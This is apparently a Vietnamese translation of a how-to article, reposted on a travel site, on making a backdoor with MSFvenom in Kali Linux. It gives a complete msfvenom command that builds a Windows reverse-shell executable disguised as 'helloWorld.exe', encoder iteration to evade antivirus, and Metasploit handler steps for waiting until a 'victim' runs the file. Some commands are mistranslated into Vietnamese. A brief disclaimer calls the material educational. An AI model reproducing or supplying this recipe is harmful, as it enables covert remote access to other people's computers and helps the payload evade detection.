Cách Tạo Một Lối Vào Sau Gần Như Không Thể Phát Hiện Sử Dụng MSFvenom trong Kali Linux

Buzz

Ngày cập nhật gần nhất: 15/4/2026

Đọc tóm tắt

- Một lối vào sau được sử dụng để bypass các cơ chế bảo mật một cách bí mật.
- Sử dụng MSFvenom để tạo lối vào sau kết nối trở lại với kẻ tấn công.
- Thay đổi chữ ký của phần mềm độc hại để tránh phần mềm diệt virus.
- Bắt đầu bằng cách mở Terminal trên Kali Linux và nhập các lệnh cần thiết.
- Tạo payload shell và thiết lập multi-handler trong Metasploit để nhận kết nối từ nạn nhân.
- Sử dụng.
- i <số> trong MSFvenom để lặp mã hóa và tránh phần mềm diệt virus.
- Lưu ý rằng việc hack mà không có sự cho phép là không đạo đức và bất hợp pháp.

Một lối vào sau được sử dụng để bypass các cơ chế bảo mật, thường là một cách bí mật và hầu như không thể phát hiện. Sử dụng MSFvenom, sự kết hợp giữa msfpayload và msfencode, bạn có thể tạo ra một lối vào sau kết nối trở lại với kẻ tấn công bằng cách sử dụng reverse shell TCP. Để phát triển một lối vào sau, bạn cần thay đổi chữ ký của phần mềm độc hại của mình để tránh bất kỳ phần mềm diệt virus nào. Hoàn thành dự án này trên một cặp máy tính mà bạn có quyền truy cập, và trong quá trình đó, bạn sẽ tìm hiểu thêm về an ninh máy tính và cách mà loại lối vào sau này hoạt động.

Các Bước

Bắt đầu Kali và mở cửa sổ Terminal.

Gõ ifconfig để hiển thị giao diện và kiểm tra địa chỉ IP của bạn.

Nhập msfvenom -l encoders để hiển thị danh sách các bộ mã hóa.

Bạn sẽ sử dụng x86/shikata_ga_nai như là bộ mã hóa.

Nhập 'msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT=4444 -b '\x00' -e x86/shikata_ga_nai -f exe > helloWorld.exe

-a x86 --platform windows chỉ định kiến trúc để sử dụng.
-p windows/shell/reverse_tcp chỉ định các payloads cần nhúng.
LHOST chỉ định địa chỉ IP của máy lắng nghe.
LPORT chỉ định cổng lắng nghe.
-b '\x00' chỉ định để tránh ký tự xấu (null bytes).
-e x86/shikata_ga_nai chỉ định tên bộ mã hóa.
-f exe > helloWorld.exe chỉ định định dạng đầu ra.

Nhập msfconsole để kích hoạt Metasploit.

Bây giờ bạn đã tạo ra lối vào sau của mình. Khi nạn nhân nhấp vào helloWorld.exe, payload shell được nhúng sẽ được kích hoạt và tạo kết nối trở lại với hệ thống của bạn. Để nhận kết nối, bạn phải mở multi-handler trong Metasploit và thiết lập các payloads.

Nhập use exploit/multi/handler.

Nhập set payload windows/shell/reverse_tcp.

Nhập hiển thị tùy chọn để kiểm tra mô-đun.

Nhập đặt LHOST 192.168.48.129.

'LHOST' chỉ định địa chỉ IP của máy lắng nghe.

Nhập đặt LPORT 4444.

'LPORT' chỉ định cổng lắng nghe.

Nhập chạy và chờ kết nối từ máy của nạn nhân.

Chờ đợi nạn nhân nhấp vào helloWorld.exe. Sau đó, bạn sẽ kết nối thành công với máy của nạn nhân.

Mẹo

Sử dụng -i <số> trong MSFvenom để biểu diễn số lần lặp mã hóa. Đôi khi việc lặp lại nhiều lần có thể giúp tránh được phần mềm diệt virus.
Bạn đã học cách tạo ra cửa sau và mã hóa bằng cách sử dụng MSFvenom, nhưng phương pháp này sẽ không hoạt động hoàn hảo đối với một số phần mềm diệt virus hiện nay. Lý do là do các mẫu thực thi trong MSFvenom. Các nhà cung cấp phần mềm diệt virus đã thêm chữ ký tĩnh của các mẫu này và chỉ cần tìm kiếm chúng. Giải pháp cho vấn đề này là sử dụng một mẫu thực thi khác hoặc các công cụ khác.

Cảnh báo

Bài viết này chỉ dành cho mục đích giáo dục. Hack mà không có sự cho phép hoặc sự ủy quyền là không đạo đức và thường là bất hợp pháp.

Thứ Bạn Cần

Kali Linux
Windows
Máy ảo
- VirtualBox
- VMware

Các câu hỏi thường gặp

Làm thế nào để tạo ra một lối vào sau sử dụng MSFvenom?

Để tạo ra lối vào sau bằng MSFvenom, bạn cần sử dụng lệnh với các tham số như kiến trúc, payload, địa chỉ IP và cổng. Ví dụ: msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.48.129 LPORT=4444 -e x86/shikata_ga_nai -f exe > helloWorld.exe.

Có những bước nào để kích hoạt kết nối trở lại với nạn nhân?

Sau khi tạo lối vào sau, bạn cần mở multi-handler trong Metasploit và thiết lập các payloads. Nhập use exploit/multi/handler, set payload windows/shell/reverse_tcp, và cấu hình LHOST và LPORT trước khi chờ kết nối từ nạn nhân.

Tại sao việc mã hóa lại quan trọng trong quá trình tạo lối vào sau?

Việc mã hóa rất quan trọng để tránh bị phát hiện bởi phần mềm diệt virus. Sử dụng bộ mã hóa như x86/shikata_ga_nai giúp thay đổi chữ ký của phần mềm độc hại, khiến nó khó bị nhận diện.

Những cảnh báo nào cần lưu ý khi tạo lối vào sau?

Cảnh báo quan trọng là hành động hack mà không có sự cho phép là không đạo đức và có thể vi phạm pháp luật. Bài viết này chỉ mang tính chất giáo dục và không khuyến khích hành vi bất hợp pháp.

Nội dung từ Mytour nhằm chăm sóc khách hàng và khuyến khích du lịch, chúng tôi không chịu trách nhiệm và không áp dụng cho mục đích khác.

Nếu bài viết sai sót hoặc không phù hợp, vui lòng liên hệ qua Zalo: 0978812412 hoặc Email: [email protected]